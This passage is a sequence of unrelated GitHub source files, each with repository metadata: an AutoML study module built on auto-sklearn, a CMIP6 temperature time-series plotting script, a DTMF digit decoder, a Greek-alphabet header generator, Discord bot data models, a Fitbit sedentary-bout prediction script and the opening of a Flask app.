self.classes_ = np.unique(y)
n_classes = len(self.classes_)
self.n_classes = n_classes
classes_ = self.classes_
if self.trial_list is None or self.trial_list == []:
self.logger.warning('no trials, init by default params.')
self.trial_list = self._init_trials(n_jobs)
if self.metrics in ['logloss']:
self.storage.direction = basic.StudyDirection.MINIMIZE
# 当前保证在Trial内进行多进程
# if n_jobs == 1:
# self._optimize_sequential(self.trial_list, timeout, catch)
# else:
# self._optimize_parallel(self.trial_list, timeout, n_jobs, catch)
import warnings
with warnings.catch_warnings():
warnings.simplefilter("ignore", category=RuntimeWarning)
# do not generate clf in advanced.
self._optimize_sequential(
self.trial_list, timeout, catch, metrics=self.metrics)
self._make_ensemble()
self._pipe_add(self.best_trial.clf)
self._export_model(self.export_model_path)
def _make_ensemble(self):
ensemble = Ensemble(self.layer, classes=self.classes_)
self.stack.add_layer(ensemble)
combiner = Combiner('mean')
self.ensemble = EnsembleStackClassifier(stack=self.stack, combiner=combiner)
self.ensemble.refit(self.storage.X_train, self.storage.y_train)
self.logger.info(self.ensemble.clf.show_models())
test_res = self.ensemble.predict(self.storage.X_test)
metrics_func = self._get_metric(self.metrics)
# metrics_func = self._get_metric('acc')
result = metrics_func(self.storage.y_test, test_res)
self.logger.info("The ensemble of all trials get the result: {0} {1}".format(self.metrics, result))
def show_models(self):
for step in self.pipeline.steps:
name, estm = step
if isinstance(estm, AutoSklearnClassifier):
print(name, estm.show_models())
else:
print(name, estm)
def set_user_attr(self, key, value):
# type: (str, Any) -> None
"""Set a user attribute to the :class:`~diego.study.Study`.
Args:
key: A key string of the attribute.
value: A value of the attribute. The value should be JSON serializable.
"""
self.storage.set_study_user_attr(self.study_id, key, value)
def set_system_attr(self, key, value):
# type: (str, Any) -> None
"""Set a system attribute to the :class:`~diego.study.Study`.
Note that diego internally uses this method to save system messages. Please use
:func:`~diego.study.Study.set_user_attr` to set users' attributes.
Args:
key: A key string of the attribute.
value: A value of the attribute. The value should be JSON serializable.
"""
self.storage.set_study_system_attr(self.study_id, key, value)
def trials_dataframe(self, include_internal_fields=False):
# type: (bool) -> pd.DataFrame
"""Export trials as a pandas DataFrame_.
The DataFrame_ provides various features to analyze studies. It is also useful to draw a
histogram of objective values and to export trials as a CSV file. Note that DataFrames
returned by :func:`~diego.study.Study.trials_dataframe()` employ MultiIndex_, and columns
have a hierarchical structure. Please refer to the example below to access DataFrame
elements.
Example:
Get an objective value and a value of parameter ``x`` in the first row.
>>> df = study.trials_dataframe()
>>> df
>>> df.value[0]
0.0
>>> df.params.x[0]
1.0
Args:
include_internal_fields:
By default, internal fields of :class:`~diego.basic.FrozenTrial` are excluded
from a DataFrame of trials. If this argument is :obj:`True`, they will be included
in the DataFrame.
Returns:
A pandas DataFrame_ of trials in the :class:`~diego.study.Study`.
.. _DataFrame: http://pandas.pydata.org/pandas-docs/stable/generated/pandas.DataFrame.html
.. _MultiIndex: https://pandas.pydata.org/pandas-docs/stable/advanced.html
"""
# column_agg is an aggregator of column names.
# Keys of column agg are attributes of FrozenTrial such as 'trial_id' and 'params'.
# Values are dataframe columns such as ('trial_id', '') and ('params', 'n_layers').
column_agg = collections.defaultdict(set) # type: Dict[str, Set]
non_nested_field = ''
records = [] # type: List[Dict[Tuple[str, str], Any]]
for trial in self.trials_list:
trial_dict = trial._asdict()
record = {}
for field, value in trial_dict.items():
if not include_internal_fields and field in basic.FrozenTrial.internal_fields:
continue
if isinstance(value, dict):
for in_field, in_value in value.items():
record[(field, in_field)] = in_value
column_agg[field].add((field, in_field))
else:
record[(field, non_nested_field)] = value
column_agg[field].add((field, non_nested_field))
records.append(record)
columns = sum((sorted(column_agg[k])
for k in basic.FrozenTrial._fields), [])
return pd.DataFrame(records, columns=pd.MultiIndex.from_tuples(columns))
def _init_trials(self, n_jobs=1):
# tpot耗时较久,舍弃。相同时间内不如auto-sklearn
auto_sklearn_trial = self.generate_trial(mode='fast', n_jobs=n_jobs, include_estimators=[
"extra_trees", "random_forest", "gaussian_nb"])
return [auto_sklearn_trial]
def _optimize_sequential(
self,
trials, # type: Optional[int]
timeout, # type: Optional[float]
catch,
metrics: str='logloss',
):
# type: (...) -> None
time_start = datetime.datetime.now()
for trial in trials:
if timeout is not None:
elapsed_seconds = (datetime.datetime.now() -
time_start).total_seconds()
if elapsed_seconds >= timeout:
break
self._run_trial(trial, catch, metrics=metrics)
gc.collect()
# TODO multi clf
def _optimize_parallel(
self,
trials,
timeout, # type: Optional[float]
n_jobs, # type: int
catch # type: Union[Tuple[()], Tuple[Type[Exception]]]
):
# type: (...) -> None
self.start_datetime = datetime.datetime.now()
if n_jobs == -1:
n_jobs = multiprocessing.cpu_count()
n_trials = len(trials)
if trials is not None:
# The number of threads needs not to be larger than trials.
n_jobs = min(n_jobs, n_trials)
if trials == 0:
return # When n_jobs is zero, ThreadPool fails.
pool = multiprocessing.pool.ThreadPool(n_jobs) # type: ignore
# A queue is passed to each thread. When True is received, then the thread continues
# the evaluation. When False is received, then it quits.
def func_child_thread(que):
# type: (Queue) -> None
while que.get():
self._run_trial(trial, catch)
self.storage.remove_session()
que = multiprocessing.Queue(maxsize=n_jobs) # type: ignore
for _ in range(n_jobs):
que.put(True)
n_enqueued_trials = n_jobs
imap_ite = pool.imap(func_child_thread, [que] * n_jobs, chunksize=1)
while True:
if timeout is not None:
elapsed_timedelta = datetime.datetime.now() - self.start_datetime
elapsed_seconds = elapsed_timedelta.total_seconds()
if elapsed_seconds > timeout:
break
if n_trials is not None:
if n_enqueued_trials >= n_trials:
break
try:
que.put_nowait(True)
n_enqueued_trials += 1
except queue.Full:
time.sleep(1)
for _ in range(n_jobs):
que.put(False)
# Consume the iterator to wait for all threads.
collections.deque(imap_ite, maxlen=0)
pool.terminate()
que.close()
que.join_thread()
@staticmethod
def _get_metric(metrics):
if metrics == 'auc' or metrics == 'roc_auc':
return diego_metrics.roc_auc
elif metrics == 'logloss':
return diego_metrics.log_loss
elif metrics == 'acc' or metrics == 'accuracy':
return diego_metrics.accuracy
elif metrics == 'balanced_acc' or metrics == 'balanced_accuracy':
return diego_metrics.balanced_accuracy
elif metrics == 'f1' or metrics == 'f1_score':
return diego_metrics.f1
elif metrics == 'mae':
return diego_metrics.mean_absolute_error
def _run_trial(self, trial, catch, metrics='auc'):
# type: (ObjectiveFuncType, Union[Tuple[()], Tuple[Type[Exception]]]) -> trial_module.Trial
trial_number = trial.number
metrics_func = self._get_metric(metrics)
try:
trial = self.fit_autosk_trial(trial,)
self.layer.append(trial.clf)
y_pred = trial.clf.predict_proba(self.storage.X_test)
result = metrics_func(self.storage.y_test, y_pred)
# except basic.TrialPruned as e:
# message = 'Setting status of trial#{} as {}. {}'.format(trial_number,
# basic.TrialState.PRUNED,
# str(e))
# self.logger.info(message)
# self.storage.set_trial_state(trial_id, basic.TrialState.PRUNED)
# return trial
except catch as e:
message = 'Setting status of trial#{} as {} because of the following error: {}'\
.format(trial_number, basic.TrialState.FAIL, repr(e))
self.logger.warning(message, exc_info=True)
self.storage.set_trial_state(trial_number, basic.TrialState.FAIL)
self.storage.set_trial_system_attr(
trial_number, 'fail_reason', message)
return trial
try:
# result = float(result)
self.logger.info('Trial{} was done'.format(trial.number))
except (
ValueError,
TypeError,
):
message = 'Setting status of trial#{} as {} because the returned value from the ' \
'objective function cannot be casted to float. Returned value is: ' \
'{}'.format(
trial_number, basic.TrialState.FAIL, repr(result))
self.logger.warning(message)
self.storage.set_trial_state(trial_number, basic.TrialState.FAIL)
self.storage.set_trial_system_attr(
trial_number, 'fail_reason', message)
return trial
if math.isnan(result):
message = 'Setting status of trial#{} as {} because the objective function ' \
'returned {}.'.format(
trial_number, basic.TrialState.FAIL, result)
self.logger.warning(message)
self.storage.set_trial_state(trial_number, basic.TrialState.FAIL)
self.storage.set_trial_system_attr(
trial_number, 'fail_reason', message)
return trial
trial.report(result)
self.storage.set_trial_state(trial_number, basic.TrialState.COMPLETE)
self._log_completed_trial(trial_number, result)
return trial
def _log_completed_trial(self, trial_number, value):
# type: (int, float) -> None
self.logger.info('Finished trial#{} resulted in value: {}. '
'Current best value is {}.'.format(
trial_number, value, self.best_value))
# TODO decorator, add trials to pipeline.
def fit_autosk_trial(self, trial, **kwargs):
# n_jobs = basic.get_approp_n_jobs(n_jobs)
trial_number = trial.number
params = trial.clf_params
autosk_clf = AutoSklearnClassifier(**params)
# X_train = self.storage.X_train
# y_train = self.storage.y_train
# TODO metrics to trial
autosk_clf.fit(self.storage.X_train, self.storage.y_train)
if autosk_clf.resampling_strategy not in ['holdout', 'holdout-iterative-fit']:
self.logger.warning(
'Predict is currently not implemented for resampling strategy, refit it.')
self.logger.warning(
'we call refit() which trains all models in the final ensemble on the whole dataset.')
autosk_clf.refit(self.storage.X_train, self.storage.y_train)
self.logger.info('Trial#{0} info :{1}'.format(
trial_number, autosk_clf.sprint_statistics()))
trial.clf = autosk_clf
return trial
def generate_trial(self, mode='fast', n_jobs=-1, time_left_for_this_task=3600, per_run_time_limit=360,memory_limit=8192,
initial_configurations_via_metalearning=0, ensemble_size=50, ensemble_nbest=50,
seed=1,include_estimators=['random_forest', 'LogisticRegressionSK', 'LogisticRegressionSMAC'],
exclude_estimators=None, include_preprocessors=None, exclude_preprocessors=None,
resampling_strategy='cv', resampling_strategy_arguments={'folds': 5},
tmp_folder="/tmp/autosklearn_tmp", output_folder="/tmp/autosklearn_output", delete_tmp_folder_after_terminate=True, delete_output_folder_after_terminate=True,
disable_evaluator_output=False, get_smac_object_callback=None, smac_scenario_args=None,
logging_config=None):
""" generate trial's base params
estimators list:
# Combinations of non-linear models with feature learning:
classifiers_ = ["adaboost", "decision_tree", "extra_trees",
"gradient_boosting", "k_nearest_neighbors",
"libsvm_svc", "random_forest", "gaussian_nb",
"decision_tree", "xgradient_boosting",
"LogisticRegressionSK", "LogisticRegressionSMAC"]
# Combinations of tree-based models with feature learning:
regressors_ = ["adaboost", "decision_tree", "extra_trees",
"gaussian_process", "gradient_boosting",
"k_nearest_neighbors", "random_forest", "xgradient_boosting"]
Keyword Arguments:
mode {str} -- [description] (default: {'fast'})
n_jobs {int} -- [description] (default: {-1})
mode {str} --
estimators list
Returns:
[type] -- [description]
"""
n_jobs = basic.get_approp_n_jobs(n_jobs)
if mode == 'fast':
time_left_for_this_task = 120
per_run_time_limit = 30
memory_limit = 4096
ensemble_size = 5
ensemble_nbest = 2
elif mode == 'big':
ensemble_size = 50
ensemble_nbest = 20
memory_limit = 10240
# ensemble_memory_limit = 4096
time_left_for_this_task = 14400
per_run_time_limit = 1440
else:
pass
from pathlib import Path
home_dir =str(Path.home())
if not os.path.exists(home_dir + '/tmp'):
os.mkdir(home_dir+"/tmp")
# split to several trial, and ensemble them
# for est in include_estimators:
auto_sklearn_trial = create_trial(self)
# auto_sklearn_trial.storage.clean_storage()
train_folder = home_dir + tmp_folder + "_" + str(self.study_id) + "_" + str(auto_sklearn_trial.number)
train_output_folder = home_dir + output_folder + "_" + str(self.study_id) + "_" + str(auto_sklearn_trial.number)
if not os.path.exists(tmp_folder):
os.mkdir(tmp_folder)
if not os.path.exists(output_folder):
os.mkdir(output_folder)
self.logger.info('The tmp result will saved in {}'.format(tmp_folder))
self.logger.info('The output of classifier will save in {}'.format(output_folder))
self.logger.info('And it will delete tmp folder after terminate.')
metrics_func = self._get_metric(self.metrics)
base_params = {'n_jobs': n_jobs,
"time_left_for_this_task": time_left_for_this_task,
"per_run_time_limit": per_run_time_limit,
"initial_configurations_via_metalearning": initial_configurations_via_metalearning,
"ensemble_size": ensemble_size,
"ensemble_nbest": ensemble_nbest,
# "ensemble_memory_limit": ensemble_memory_limit,
"seed": seed,
"memory_limit": memory_limit,
"include_estimators": include_estimators,
"exclude_estimators": exclude_estimators,
"include_preprocessors": include_preprocessors,
"exclude_preprocessors": exclude_preprocessors,
"resampling_strategy": resampling_strategy,
"resampling_strategy_arguments": resampling_strategy_arguments,
"tmp_folder":train_folder, "output_folder": train_output_folder,
"delete_tmp_folder_after_terminate": delete_tmp_folder_after_terminate,
"delete_output_folder_after_terminate": delete_output_folder_after_terminate,
# "shared_mode": shared_mode,
"disable_evaluator_output": disable_evaluator_output,
"get_smac_object_callback": get_smac_object_callback,
"smac_scenario_args": smac_scenario_args,
"logging_config": logging_config,
'metric': metrics_func}
# n_jobs ": basic.get_approp_n_jobs(n_jobs)
auto_sklearn_trial.clf_params = base_params
self.trial_list.append(auto_sklearn_trial)
return auto_sklearn_trial
def add_preprocessor_trial(self, trial):
pass
def _pipe_add(self, step):
"""add steps to Study.pipeline
Arguments:
step {[list]} -- ['name', clf]
"""
if isinstance(step, list):
if step is not None and not hasattr(step, "fit"):
raise TypeError("Last step of Pipeline should implement fit. "
"'%s' (type %s) doesn't"
% (step, type(step)))
if isinstance(step, Pipeline) and self.pipeline is None:
self.pipeline = step
return
else:
pass
if self.pipeline is None:
self.pipeline = make_pipeline(step)
else:
steps = _name_estimators([step])
self.pipeline.steps += steps
def _export_model(self, export_model_path):
if export_model_path is None or export_model_path == '':
return
# export_model_path = '/tmp/'+model_name
model_name = 'diego_model_' + str(self.study_name) + '.joblib'
to_export_model_path = export_model_path + model_name
joblib.dump(self.pipeline, to_export_model_path)
ensemble_name = 'diego_ensemble_' + str(self.study_name) + '.joblib'
export_ensemble_path = export_model_path + ensemble_name
joblib.dump(self.pipeline, export_ensemble_path)
def create_trial(study: Study):
trial_id = study.storage.create_new_trial_id(study.study_id)
trial = Trial(study, trial_id)
return trial
def get_storage(storage):
# type: (Union[None, str, BaseStorage]) -> BaseStorage
if storage is None:
return Storage()
else:
return storage
def create_study(X, y,
storage=None, # type: Union[None, str, storages.BaseStorage]
sample_method=None,
metrics=None,
study_name=None, # type: Optional[str]
direction='maximize', # type: str
load_cache=False, # type: bool
is_autobin=False,
bin_params=dict(),
sample_params=dict(),
trials_list=list(),
export_model_path=None,
precision=np.float64,
):
# type: (...) -> Study
"""Create a new :class:`~diego.study.Study`.
Args:
storage:
Database URL. If this argument is set to None, in-memory storage is used, and the
:class:`~diego.study.Study` will not be persistent.
sampler:
A sampler object that implements background algorithm for value suggestion. See also
:class:`~diego.samplers`.
study_name:
Study's name. If this argument is set to None, a unique name is generated
automatically.
is_auto_bin: do autobinning
bin_params: binning method
precision {[np.dtype]} -- precision:
np.dtypes, float16, float32, float64 for data precision to reduce memory size. (default: {np.float64})
Returns:
A :class:`~diego.study.Study` object.
"""
X, y = check_X_y(X, y, accept_sparse='csr')
storage = get_storage(storage)
try:
study_id = storage.create_new_study_id(study_name)
except basic.DuplicatedStudyError:
# 内存中最好study不要重名,而且可以读取已有的Study。 数据存在storage中。
# if load_if_exists:
# assert study_name is not None
# logger = logging.get_logger(__name__)
# logger.info("Using an existing study with name '{}' instead of "
# "creating a new one.".format(study_name))
# study_id = storage.get_study_id_from_name(study_name)
# else:
raise
study_name = storage.get_study_name_from_id(study_id)
study = Study(
study_name=study_name,
storage=storage,
sample_method=sample_method,
is_autobin=is_autobin,
bin_params=bin_params,
export_model_path=export_model_path,
precision=precision,
metrics=metrics)
if direction == 'minimize':
_direction = basic.StudyDirection.MINIMIZE
elif direction == 'maximize':
_direction = basic.StudyDirection.MAXIMIZE
else:
raise ValueError(
'Please set either \'minimize\' or \'maximize\' to direction.')
if metrics in ['logloss']:
_direction = basic.StudyDirection.MINIMIZE
X = X.astype(dtype=precision, copy=False)
study.storage.direction = _direction
study.storage.set_train_storage(X, y)
return study
def load_study(
study_name, # type: str
storage, # type: Union[str, storages.BaseStorage]
):
# type: (...) -> Study
"""Load the existing :class:`~diego.study.Study` that has the specified name.
Args:
study_name:
Study's name. Each study has a unique name as an identifier.
storage:
Database URL such as ``sqlite:///example.db``. diego internally uses `SQLAlchemy
<https://www.sqlalchemy.org/>`_ to handle databases. Please refer to `SQLAlchemy's
document <https://docs.sqlalchemy.org/en/latest/core/engines.html#database-urls>`_ for
further details.
"""
return Study(study_name=study_name, storage=storage)
def get_all_study_summaries(storage):
# type: (Union[str, storages.BaseStorage]) -> List[basic.StudySummary]
"""Get all history of studies stored in a specified storage.
Args:
storage:
Database URL.
Returns:
List of study history summarized as :class:`~diego.basic.StudySummary` objects.
"""
storage = get_storage(storage)
return storage.get_all_study_summaries()
| lai-bluejay/diego | diego/study.py | study.py | py | 34,931 | python | en | code | 8 | github-code | 90 |
17409216990 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Compare piControl and abrupt-4xCO2 timeseries of tas.
"""
from cmiputil import esgfsearch
from cmiputil.timer import timer
from pprint import pprint
from os.path import basename
from pathlib import Path
import argparse
import json
import xarray as xr
from cftime import num2date
import matplotlib.pyplot as plt
__author__ = 'T.Inoue'
__credits__ = 'Copyright (c) 2019 RIST'
__version__ = 'v20190614'
__date__ = '2019/06/14'
desc = __doc__
epilog = """
`Experiment_id` and `variable_id` are forced as above, regardless of the
setting in config file and command line option.
"""
def my_parser():
parser = argparse.ArgumentParser(
formatter_class=argparse.RawDescriptionHelpFormatter,
description=desc,
epilog=epilog)
parser.add_argument(
'-d', '--debug', action='store_true', default=False)
parser.add_argument(
'-c', '--conffile', type=str, default="",
help='config file')
parser.add_argument(
'-l', '--local', action='store_true', default=False,
help='search local data')
parser.add_argument(
'params', type=str, nargs='*', default=None,
help='key=value series of keyword/facet parameters'
)
return parser
def composeMeta(datasets):
"""
Compose meta info dictionaries from a list of xarray.Dataset
obtained by getDatasets().
Returns `meta` dictionary.
"""
if datasets is None:
return None
# print(type(datasets))
meta = {}
for ds in datasets:
if not ds:
continue
# print(type(ds))
dsname = basename(ds.further_info_url)
print(f"Compose meta info for: {dsname}")
try:
var = ds[ds.variable_id]
except IndexError:
print(f"{ds.variable_id} not found in {dsname}")
raise
var_id = getattr(var, 'name')
t_size = getattr(ds.time, 'size', None)
# Sometimes time.unit is missing, num2date raise AttirbuteError.
t_units = getattr(ds.time, 'units', None)
try:
t_range = str(num2date(ds.time[[0, -1]], t_units))
except AttributeError:
t_range = str(ds.time.data[[0,-1]])
meta.setdefault(ds.experiment_id, []).append({
# No filepath() or path related attributes in xarray.dataset.
# 'file': ds.filepath(),
'source': ds.source_id,
'experiment_id': ds.experiment_id,
'variable|id': var_id,
'variable|long_name': var.long_name,
'variabel|units': var.units,
'calendar': ds['time'].calendar,
'branch_time': ds.branch_time_in_parent,
't_units': t_units,
't_size': t_size,
't_range': t_range
})
return meta
def openDatasets(data_urls):
"""
Open and return dataset object from dataset URLs.
Dataset URLs are set as :attr:`data_urls` attribute of `self`,
obtained by, for example, :meth:`getDataURLs`.
If `url` is a list, they are opened as a multi-file dataset,
via `xarray.open_mfdataset()` or `netCDF4.MFDataset()`.
Opened datasets are stored as :attr:`dataset` of `self`.
"""
res = [_openDataset(url) for url in data_urls]
datasets = [d for d in res if d]
return datasets
def _openDataset(url):
try:
if type(url) is list:
ds = xr.open_mfdataset(url, decode_cf=False)
else:
# ds = xr.open_dataset(url,
# decode_times=False, decode_cf=False)
ds = xr.open_dataset(url, decode_cf=False)
except (KeyError, OSError) as e:
print(f"Error in opening xarray dataset:"
f"{basename(url)}:{e.args}\n Skip.")
else:
return ds
def openLocalDatasets(data_files):
"""
Open and return dataset object from local dataset paths.
Dataset paths are set as :attr:`local_dirs` of `self`, obtained
by, for example, :meth:`getLocalDirs()`.
"""
if not data_files:
datasets = None
else:
res = [_openLocalDataset(p) for p in data_files]
datasets = [d for d in res if d]
return datasets
def _openLocalDataset(p):
print('dbg:',p, type(p))
return xr.open_mfdataset(p, decode_times=False)
def drawPlot(datasets):
# to shut up the warning message...
# from pandas.plotting import register_matplotlib_converters
# register_matplotlib_converters()
fig = plt.figure(figsize=(16, 8))
ax = fig.add_subplot(111)
for d in datasets:
label = ':'.join((d.source_id, d.experiment_id, d.variant_label))
print(f"plotting {label}")
try:
# Just a quick hack, should get area averaged.
# d['tas'].sel(lon=0, lat=0, method='nearest')\
# .plot(ax=ax, label=label)
d[d.variable_id].mean(('lon', 'lat')).plot(ax=ax, label=label)
except RuntimeError as e:
print('Skip error:', e.args)
continue
ax.legend()
print('Ready to plot...')
plt.show()
print('Done.')
def main():
a = my_parser().parse_args()
params = {}
for p in a.params:
k, v = p.split('=')
params.update({k: v})
# force these two experiment and variable
params_force = {
'experiment_id': 'piControl, abrupt-4xCO2',
'variable_id': 'tas'}
params.update(params_force)
if (a.debug):
esgfsearch.ESGFSearch._enable_debug()
es = esgfsearch.ESGFSearch(conffile=a.conffile)
if a.local:
es.getLocalDirs(params)
print('Local Directories:')
pprint(es.local_dirs)
es.getDataFiles()
print('Local Dataset files:')
pprint(es.data_files)
datasets = openLocalDatasets(es.data_files)
if datasets:
print('Num of datasets:', len(datasets))
else:
exit(1)
else:
with timer('Do Search'):
es.doSearch(params)
with timer('getting Catalog URLs'):
es.getCatURLs()
if es.cat_urls:
pprint(es.cat_urls)
with timer('getting Dataset URLs'):
es.getDataURLs()
if es.data_urls:
pprint(es.data_urls)
with timer('getting Dataset'):
datasets = openDatasets(es.data_urls)
if datasets:
print(f'Num of datasets found: {len(datasets)}')
else:
exit(1)
with timer('constructing meta info'):
meta = composeMeta(datasets)
outfile = 'meta_info.json'
Path(outfile).write_text(json.dumps(meta, indent=4))
print(f'meta info wriiten to {outfile}')
with timer('drawing graph'):
# draw timeseries of each dataset
drawPlot(datasets)
if (__name__ == '__main__'):
main()
| RIST-tinoue/cmiputil | samples/pc-ab4co2-ts.py | pc-ab4co2-ts.py | py | 6,877 | python | en | code | 0 | github-code | 90 |
72668696936 | class DTMF:
@classmethod
def _dtmf(cls, keypad_strokes):
text = ""
_keys = {"1336-941": "0",
"1209-697": "1",
"1336-697": "2",
"1477-697": "3",
"1209-770": "4",
"1336-770": "5",
"1477-770": "6",
"1209-852": "7",
"1336-852": "8",
"1477-852": "9"
}
for i in keypad_strokes.split():
text += (_keys[i])
return text
@classmethod
def decrypt(cls, message):
"""Decrypts DTMF Cypher :
Each numeral string represents a number
as given in _keys
More at:
https://en.wikipedia.org/wiki/Dual-tone_multi-frequency_signaling
Args:
message (str): encrypted text
Returns:
dict: {"DTMF" : [output]}
"""
try:
dtmf = cls._dtmf(message)
except:
dtmf = "N/A"
return {"DTMF": dtmf}
| bhavyakh/decrypto | decrypto/cipher/dtmf.py | dtmf.py | py | 1,031 | python | en | code | 12 | github-code | 90 |
44086358640 |
file = open("Greek.txt", mode='r', encoding='UTF-8')
edits = []
for i in range(0,24):
line = file.readline()
if not line: break
temp = line.split()
edit = [" //"+temp[0],"\n const std::string", temp[1]+"(\""+temp[2]+"\");"]
edits.append(edit)
for i in range(0,24):
line = file.readline()
if not line: break
temp = line.split()
edit = [" //"+temp[0],"\n const std::string", temp[1].lower()+"(\""+temp[2]+"\");"]
print(edit)
edits.append(edit)
print('\u03BC')
file.close()
file =open("Greekedit.txt", mode='w', encoding='UTF-8')
for edit in edits:
for word in edit:
file.write(word+" ")
file.write("\n")
file.close() | Markgraf-Oh/Greek-Alphabet-for-Cpp | Greek.py | Greek.py | py | 694 | python | en | code | 0 | github-code | 90 |
70589936618 | from bson.objectid import ObjectId
from naff import Scale, Permissions
from dataclasses import dataclass
"""
This is for your main DB objects.
"""
@dataclass(slots=True)
class User:
_id: ObjectId
id: int
@dataclass(slots=True)
class Guild:
_id: ObjectId
id: int
class AdminScale(Scale):
def __init__(self, bot) -> None:
self.bot = bot
self.db = bot.db
self.database = bot.db.db
self.add_scale_check(self.is_manager)
async def is_manager(self, ctx):
return ctx.author.has_permission(Permissions.MANAGE_GUILD) | KAJdev/bot-starter | models.py | models.py | py | 578 | python | en | code | 0 | github-code | 90 |
41901016084 | import struct
from .core import encode_block, derive_keys
class DesKey():
def __init__(self, key: bytes):
self.__key = key
def encrypt(self, message: bytes, padding=True):
return handle_cipher(message, self.__key, padding, True)
def decrypt(self, message: bytes, padding=True):
return handle_cipher(message, self.__key, padding, False)
def __hash__(self):
return hash((self.__class__, self.__key))
def handle_cipher(message, key, padding, encryption):
assert isinstance(key, bytes), "The key should be `bytes` or `bytearray`"
assert len(key) == 8, "The key should be of length 8"
message = guard_message(message, padding, encryption)
dkeys = tuple(derive_keys(key))
blocks = (struct.unpack(">Q", message[i: i + 8])[0]
for i in range(0, len(message), 8))
encoded_blocks = []
for block in blocks:
encoded_blocks.append(encode_block(block, dkeys, encryption))
ret = b"".join(struct.pack(">Q", block) for block in encoded_blocks)
return ret[:-ord(ret[-1:])] if not encryption and padding else ret
def guard_message(message, padding, encryption):
assert isinstance(message, bytes), "The message should be bytes"
length = len(message)
# PKCS5 padding
if encryption and padding:
return message.ljust(length + 8 >> 3 << 3, bytes((8 - (length & 7), )))
assert length & 7 == 0, (
"The length of the message should be divisible by 8"
"(or set `padding` to `True` in encryption mode)"
)
return message
| SingularityUrBrain/network-security | Kerberos_des/des/base.py | base.py | py | 1,559 | python | en | code | 0 | github-code | 90 |
5838023357 | from __future__ import print_function
import subprocess
import configparser
import copy
import datetime as dt
import math
import numpy as np
import pandas as pd
from pandas.tseries.offsets import *
from sklearn.tree import DecisionTreeClassifier, export_graphviz
from scipy.stats.stats import spearmanr
config = configparser.ConfigParser()
config.read('user.ini')
user_id = config.get('default', 'user_id')
fitbit_user_data_dir = config.get('default', 'data_for_analysis')
today = config.get('default', 'today')
day_start_time = float(config.get('default', 'day_start_time')) * 4
day_end_time = float(config.get('default', 'day_end_time')) * 4
# sed_test_filename = fitbit_user_data_dir + user_id + '_sed_test.csv'
# sed_test = pd.read_csv(sed_test_filename, index_col='time_of_day', header=0, encoding='ISO-8859-1')
# print(sed_test.head())
sed_train_filename = fitbit_user_data_dir + user_id + '_sed_train.csv'
sed_train = pd.read_csv(sed_train_filename, index_col='time_of_day', header=0, encoding='ISO-8859-1')
sed_train = sed_train.reset_index()
print(len(sed_train))
sed_test = sed_train[-96*20:-96]
sed_test = sed_test.reset_index()
sed_train = sed_train[:(len(sed_train)-96*20)]
def predict_sed(train, test):
features = ['1', '2', '3']
y = train['sed_prolong']
x = train[features]
tree = DecisionTreeClassifier(min_samples_split=50)
tree = tree.fit(x, y)
# check self prediction accuracy
accuracy = tree.score(x, y)
print(accuracy)
# predict sedentary bouts
x_predict = test[features]
y_predicted = tree.predict(x_predict)
result_compare = test
result_compare['predicted'] = y_predicted
# result_compare = pd.DataFrame({'predicted': y_predicted, 'value': test['sed_prolong']})
print("prediction accuracy based on test data is %f " % tree.score(test[features], test['sed_prolong']))
# print(tree.feature_importances_)
# corr = spearmanr(train['day_of_week'], y)[0]
# p = spearmanr(train['day_of_week'], y)[1]
return result_compare
results = predict_sed(sed_train, sed_test)
print(results.head())
from matplotlib import pyplot
# pyplot.plot(results['predicted'])sd
# pyplot.show()
# pyplot.plot(results['value'], color='red')
# pyplot.show()
# get predicted_sed_prolong_start_time
def get_sed_prolong_start_time(data, reference_col, new_col_name):
# find: 1. starting time of prolonged sedentary behavior, 2. length of each prolonged sedentary time
data[new_col_name] = 0
m = 0
n = 1
while n < len(data):
if data.loc[m, reference_col] == 1:
if data.loc[n, reference_col] == 1:
# check if consecutive
t_1 = pd.to_datetime(data.loc[n - 1, 'date'] + ' ' + data.loc[n - 1, 'time']) # TODO: modify timestamp representation
t_2 = pd.to_datetime(data.loc[n, 'date'] + ' ' + data.loc[n, 'time'])
time_delta = t_2 - t_1
if time_delta == dt.timedelta(minutes=15):
data.loc[m, new_col_name] += 1
n += 1
else:
m = n
n = m + 1
else:
m = n + 1
n = m + 1
else:
m = n
n += 1
return data
new_results = get_sed_prolong_start_time(results, 'predicted', 'predicted_sed_prolong_start_time')
print(new_results.head())
def get_notification(predicted, reference_col):
predicted = copy.deepcopy(predicted)
predicted = predicted[predicted[reference_col] >= 5]
predicted = predicted.reset_index()
date_time = []
notification = []
for i in predicted.index:
num_msg = math.floor((predicted.loc[i, reference_col] + 1) / 6)
start_time = pd.to_datetime(predicted.date_time[i]) + DateOffset(hours=1.5)
for j in range(num_msg):
date_time.append(start_time)
notification.append("Would you like to take a break?")
start_time = start_time + DateOffset(hours=1.5)
notification = pd.DataFrame({'date_time': date_time, 'notification': notification})
print("notifications generated as follow")
print(notification)
return notification
get_notification(new_results, 'sed_prolong_start_time')
get_notification(new_results, 'predicted_sed_prolong_start_time')
| salomeow/fyp_server_py | 3_predict_sed.py | 3_predict_sed.py | py | 4,314 | python | en | code | 0 | github-code | 90 |
36293447394 | # -*- coding: utf-8 -*-
"""
Created on Sun Oct 9 13:08:47 2022
@author: qomon
"""
def consumer_info(name,surname,birth,place,email='',number=None):
consumer={'name':name,
'surname':surname,
'birth':birth,
'place':place,
'email':email,
'number':number}
return consumer
print('Please, give information about the consumer:')
consumers=[]
while True:
name=input('Please write consumer name:')
surname=input('please write the surname: ')
birth=int(input('please write year of birth:' ))
place=input("please write your birth place:")
email=input('please write email address: ')
number=input("please write the phone number: ")
consumers.append(consumer_info(name,surname,birth,place,email,number))
answer=input('Do you want to keep on? yes/no ')
if answer!='yes':
break
print('Consumers:')
for consumer in consumers:
print(f'{consumer["name"].title()} {consumer["surname"].title()}.'
f"{consumer['birth']} born in {consumer['place']}."
f"he/she is {2020-consumer['birth']}, phone number is {consumer['number']}.")
| Farrukh-Maruf/python-works-from-anvarnarz | 20thlessson.def.asking..py | 20thlessson.def.asking..py | py | 1,167 | python | en | code | 4 | github-code | 90 |
24008790433 | from make_prediction import make_prediction, data_merge, preprocess_headlines, preprocess_posts, classify_news, calc_change_sentiment, get_news,get_stock,get_tweets
import flask
from flask import request
from markupsafe import escape
from flask import render_template,Flask, redirect, url_for, request
app = flask.Flask(__name__)
@app.route('/')
def home():
return render_template('index.html')
@app.route('/about')
def read_me():
